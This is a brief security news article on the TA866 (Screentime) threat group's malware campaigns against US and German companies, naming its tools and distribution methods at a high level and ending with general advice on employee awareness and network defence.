A previously unknown threat actor, dubbed TA866, has been targeting companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Enterprise security company Proofpoint, which is tracking the activity cluster under the name Screentime, said the group is likely financially motivated. The campaigns have been ongoing since October 3, 2022 and have employed a variety of malicious attachments and URLs in order to initiate a multi-step attack chain. The payloads used by the adversary range from macro-laced Microsoft Publisher files to JavaScript files and the MSI installer WasabiSeed, which can fetch next-stage malware from a remote server. Post-exploitation malware is also distributed, with select attacks deploying an AutoHotKey (AHK)-based bot to drop an information stealer named Rhadamanthys. The adversary is also using a traffic direction system (TDS) called 404 TDS, enabling them to serve malware only in scenarios where the victims meet a specific set of criteria.
The origins of TA866 remain unclear, however, Russian language variable names and comments have been identified in the source code of AHK Bot, a 2020 variant of which was employed in attacks aimed at Canadian and U.S. banks. The malware is also suspected to have been used as far back as April 2019. Furthermore, researchers have also observed an increase in threat actors using novel techniques to execute code on targets’ devices, such as search engine optimization (SEO) poisoning, malvertising, and brand spoofing to distribute malware. Rogue ads on Google search results are also being used to redirect users to fraudulent credential phishing websites.
It is important to note that in order for a compromise to be successful, a user must click on a malicious link and, if successfully filtered, interact with a malicious JavaScript file to download and run additional payloads. As such, it is vital that organizations ensure their network security is up-to-date in order to protect themselves from such attacks. Additionally, it is also essential for organizations to remain vigilant and educate employees on how to recognize malicious emails and online threats.
In summary, TA866 is an organized actor that is targeting companies in the U.S. and Germany with bespoke malware designed to steal confidential information. The group is using a variety of malicious attachments and URLs to initiate a multi-step attack chain, and is also employing other novel techniques such as SEO poisoning, malvertising, and brand spoofing to distribute malware. It is essential for organizations to ensure their network security is up-to-date, as well as remain vigilant and educate employees on how to recognize malicious emails and online threats. To stay ahead of these threats, organizations should consider working with a professional security provider to protect their networks and data.